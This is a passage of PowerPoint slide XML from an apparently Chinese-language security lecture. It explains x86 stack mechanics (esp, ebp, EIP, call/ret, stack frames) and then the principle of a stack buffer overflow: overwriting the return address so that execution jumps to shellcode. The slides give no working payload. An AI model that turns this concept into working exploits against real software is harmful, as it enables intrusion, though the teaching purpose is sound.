      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31755" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1836738" y="2941638"/>
            <a:ext cx="1439862" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存高端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31756" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357188" y="4090988"/>
            <a:ext cx="8388350" cy="1816100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>压栈（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>）时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>=esp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>出栈（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>）时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>=esp+4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>相对固定不变，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>及偏移量访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>栈中数据如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31757" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="2005013"/>
            <a:ext cx="863600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接箭头连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="713581" y="2428082"/>
            <a:ext cx="12858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rot="5400000" flipH="1" flipV="1">
            <a:off x="6822282" y="2464594"/>
            <a:ext cx="13573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9" descr="http://enjoy.eastday.com/eastday/mil/node62186/node62675/node69517/images/003501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327025"/>
            <a:ext cx="1450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835150" y="5871097"/>
            <a:ext cx="5327650" cy="95410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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆栈：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>队列：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FIFO</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>223</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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PC(EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指针指引程序执行，执行一条代码后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行下一条代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数调用时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转进入函数代码执行，函数返回后返回主调函数继续执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要记录程序中一系列函数返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>顺序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用（记录）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回（使用）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与堆栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>filo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>吻合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用时记录，压栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回时使用，弹栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数调用时堆栈状况</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224</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="747522" name="Picture 2" descr="http://www.hztarena.org/Upfiles/Article/20133149484656.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4423389" y="3789040"/>
            <a:ext cx="4613107" cy="3000396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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2763937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用堆栈记录函数返回地址及函数执行环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数过程活动记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈帧：参数、返回地址、局部变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>每次（个）函数调用产生对应栈帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆栈中保留所有未返回函数栈帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>活跃函数栈帧最顶端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数调用时堆栈状况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5023865" y="3284984"/>
            <a:ext cx="4084639" cy="3121025"/>
            <a:chOff x="1688" y="1253"/>
            <a:chExt cx="2573" cy="1966"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36868"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局部变量</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36869"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36870"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36871"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36872"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36873"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36874" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1688" y="1570"/>
              <a:ext cx="502" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"/>
                <a:t>低端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36875" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1689" y="2523"/>
              <a:ext cx="502" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"/>
                <a:t>高端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36876"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36877"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36878"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79"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80"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36881"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3" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>225</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3180894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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数调用时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令将返回地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令下一条指令地址）压栈，生成栈帧。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数返回时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令会把压栈的返回地址弹给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（指令寄存器），同时释放栈帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈溢出攻击的原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出局部变量修改栈中返回地址，使其指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数返回，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取篡改后的返回地址，并执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>挑战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、准确定位函数返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、篡改返回地址指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈溢出攻击的原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6A1A76DD-83F5-47DB-9B88-5D54EAD265D5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>226</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5194623" y="4005064"/>
            <a:ext cx="3841872" cy="2760985"/>
            <a:chOff x="1651" y="1253"/>
            <a:chExt cx="2610" cy="1966"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7"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局部变量</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8"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9"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10"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11"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12"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13" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1651" y="1570"/>
              <a:ext cx="539" cy="329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>低端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1651" y="2523"/>
              <a:ext cx="540" cy="329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>高端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15"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16"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17"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8"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9"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20"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5089744"/>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a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击瞄准器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42911739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107504" y="33372"/>
            <a:ext cx="3672408" cy="4655988"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>void fun(int);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>int main(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
